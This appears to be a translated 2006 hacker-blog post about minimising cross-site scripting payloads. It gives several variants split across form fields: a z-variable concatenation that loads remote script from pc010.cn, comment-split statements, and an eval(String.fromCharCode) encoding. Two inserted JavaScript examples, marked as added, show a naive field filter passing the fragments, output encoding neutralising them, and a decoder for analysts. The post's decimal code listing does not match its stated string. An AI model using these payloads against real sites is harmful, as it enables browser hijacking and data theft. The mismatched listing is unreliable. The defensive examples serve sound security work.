On that day I asked: what is the shortest cross-site (XSS) statement? In the past I would have answered with the usual cross-site code, <SCRIPT>alert("A")</SCRIPT>, which comes to 27 characters in total. But then I saw, in the Hacker's Manual article "Crazy cross-site trip", another way of writing a cross-site statement:
<SCRIPT>z='document.'</SCRIPT>
<SCRIPT>z=z+'write("'</SCRIPT>
<SCRIPT>z=z+'<SCRIPT '</SCRIPT>
<SCRIPT>z=z+'src=ht'</SCRIPT>
<SCRIPT>z=z+'tp://ww'</SCRIPT>
<SCRIPT>z=z+'w.pc010'</SCRIPT>
<SCRIPT>z=z+'.cn/1.'</SCRIPT>
<SCRIPT>z=z+'js></sc'</SCRIPT>
<SCRIPT>z=z+'ript>")'</SCRIPT>
<SCRIPT>eval(z)</SCRIPT>
Each of these statements is submitted separately. As long as all of them end up displayed on one page, the code is assembled piece by piece into the variable z, and the complete string is:
document.write("<SCRIPT src=http://www.pc010.cn/1.js></SCRIPT>")
The variable z is then passed to eval() to execute, which produces the cross-site effect. LCX noted in the article that the smallest valid fragment can be 26 characters, namely <SCRIPT>z=z+'d "'</SCRIPT>, so the minimum cross-site length is 26 characters. (While searching for information on the Internet today, I found that this can be shortened by one more character: <SCRIPT>z+='d "'</SCRIPT>, replacing =z+ with +=. Hey, that brings it down to 25 characters. Still, it seems a bit sad that I can only make breakthroughs on the foundation of others! :( ) After I replied to Jianxin, he sent back a smiling face. I felt this guy was bound to find a shorter cross-site method. /Jmdcw/
Sure enough, today I opened the phpwind vulnerability article in the ninth issue of the Hacker's Manual (for some reason I hadn't read the book carefully for a long time), and it mentions even shorter cross-site code, as follows:
<SCRIPT>open(/*
*/"http://127"/*
*/+".0.0.1/"/*
*/)</SCRIPT>
Here /* and */ are the script's comment delimiters, and the pieces are submitted separately. The condition is the same as before: all the submitted pieces must land on one page, so that whatever the page renders between them falls inside a comment, as shown below:
<SCRIPT>open(/* other page content, commented out */"http://127"/* other page content, commented out */+".0.0.1/"/* other page content, commented out */)</SCRIPT>
So what is the shortest statement? It seems that <SCRIPT> itself cannot be split. Apart from that, the functions the script defines, such as open, cannot run normally once split either. /jmdcw
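From the defender's side, the point of these split statements is that each fragment on its own looks harmless to a per-field check, while the assembled page is a complete script. The following is an added example, not code from this post or from the Hacker's Manual article it cites: it takes the comment-split fragments above as constructed input, shows that a hypothetical per-field length cap plus keyword denylist passes every one of them, and shows that HTML-entity encoding each fragment at output time (escapeHtml, written here) leaves nothing a browser would parse as a script element. The function names and the denylist are this example's own.

```javascript
// Added example (not from the original post): the two sides of the problem the
// post describes, seen from the application that renders user content.
// 1. A per-field filter or length limit sees only harmless-looking fragments.
// 2. Encoding each fragment for HTML at output time neutralises them no matter
//    how they are recombined on the page.

// Constructed input: the comment-split statement from the post, one fragment
// per form field, in the order the page renders them.
const FRAGMENTS = [
  '<SCRIPT>open(/*',
  '*/"http://127"/*',
  '*/+".0.0.1/"/*',
  '*/)</SCRIPT>',
];

// Hypothetical per-field control: a length cap plus a denylist of the long
// function names the post says cannot be split. Every fragment above passes.
function fieldPassesNaiveFilter(field, maxLen = 16) {
  const denied = ['eval', 'fromcharcode', 'document.write'];
  const lower = field.toLowerCase();
  return field.length <= maxLen && !denied.some(k => lower.includes(k));
}

// The actual control: contextual output encoding. Every character that can open
// or close HTML syntax becomes an entity, so the browser shows the fragment as
// text and never starts a <script> element.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// The page body when fragments are echoed raw (vulnerable) and when each one is
// encoded first (fixed). Both return the assembled HTML for inspection.
function renderRaw(fragments) {
  return fragments.join('\n');
}
function renderEncoded(fragments) {
  return fragments.map(escapeHtml).join('\n');
}

// Sanity check for a test harness: does a <script element start anywhere in
// the assembled page?
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

console.log(FRAGMENTS.every(f => fieldPassesNaiveFilter(f)));  // true: the filter is blind
console.log(containsScriptElement(renderRaw(FRAGMENTS)));      // true: raw page carries a script
console.log(containsScriptElement(renderEncoded(FRAGMENTS)));  // false: encoded page does not
```

containsScriptElement is only a check for the harness; the control is the encoding itself, which holds whatever the order, number or length of the fragments. Where user content must be rendered as HTML rather than text, a sanitizer plus a Content Security Policy that disallows inline scripts and eval closes the eval and fromCharCode variants discussed later in the post as well.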
First convert the statement above, document.write("<SCRIPT src=http://www.pc010.cn/1.js></SCRIPT>"), into its decimal character codes:
100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, 47,115, 99,114,105,112,116, 62,34, 41,59
Then wrap the codes in eval and String.fromCharCode and execute: <SCRIPT>eval(String.fromCharCode(100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, 47,115, 99,114,105,112,116, 62,34, 41,59))</SCRIPT>
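When a statement like this turns up in a log or a form submission, an analyst wants to know what the fromCharCode call builds without running it. The decoder below is an added example, not code from the post: it strips /* */ block comments (so fields split in the way the post describes can be reassembled in render order first), finds each fromCharCode(...) call regardless of spacing or case, and returns the decoded strings. The first sample input is the decimal listing printed in the post; decoding it shows that the listing is an abbreviated transcription of the document.write string rather than the complete one. The second sample is a constructed comment-split version of the first eight codes. The function names are this example's own.

```javascript
// Added example (not from the original post): decode String.fromCharCode(...)
// payloads found in captured input without executing them.

// Constructed sample 1: the decimal listing printed in the post, in the
// eval(String.fromCharCode(...)) form it is meant to be used in.
const SAMPLE_ONE_FIELD =
  '<SCRIPT>eval(String.fromCharCode(100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, ' +
  '60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, ' +
  '47,115, 99,114,105,112,116, 62,34, 41,59))</SCRIPT>';

// Constructed sample 2: the same idea split across form fields with /* */
// comments, as in the post; only the first eight codes ("document") are used.
const SAMPLE_SPLIT_FIELDS = [
  '<SCRIPT>/*', '*/eval(/*', '*/String/*', '*/./*', '*/fromCharCode/*',
  '*/(100,/*', '*/111,99,117,109,101,110,116/*', '*/)/*', '*/)</SCRIPT>',
];

// Remove /* ... */ comments; what remains is what the browser would execute
// once the fields are rendered together on one page.
function stripBlockComments(text) {
  return text.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Join fields in render order, then drop the comments that glue them together.
function reassemble(fields) {
  return stripBlockComments(fields.join('\n'));
}

// Find every fromCharCode(...) call (case- and whitespace-insensitive, so
// "String. fromcharcode (" in a log line still matches) and decode its
// numeric arguments. Returns one decoded string per call, in order.
function decodeFromCharCode(text) {
  const callRe = /from\s*char\s*code\s*\(([\d\s,]*)\)/gi;
  const decoded = [];
  let m;
  while ((m = callRe.exec(text)) !== null) {
    const codes = m[1].split(',').map(s => s.trim()).filter(Boolean).map(Number);
    // Skip calls with out-of-range values rather than producing junk.
    if (codes.every(c => Number.isInteger(c) && c >= 0 && c <= 0xffff)) {
      decoded.push(String.fromCharCode(...codes));
    }
  }
  return decoded;
}

console.log(decodeFromCharCode(SAMPLE_ONE_FIELD));
console.log(decodeFromCharCode(reassemble(SAMPLE_SPLIT_FIELDS)));
```

Because the decoder works on the reassembled text, the same triage step covers both the single-field form and the comment-split form; the only per-field fact it relies on is the render order, which the rendering application knows.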
Now split it using Jianxin's method:
<SCRIPT>/*
*/eval(/*
*/String/*
*/./*
*/fromCharCode/*
*/(100,/*
*/111,99,/*
*/......./*
*/59))/*
*/</SCRIPT>
The longest piece is */fromCharCode/*, 16 characters, because this is a function name reserved by the script and cannot be split. So the smallest cross-site statement is determined by the function being used.
By lonely hedgehog
2006-12-10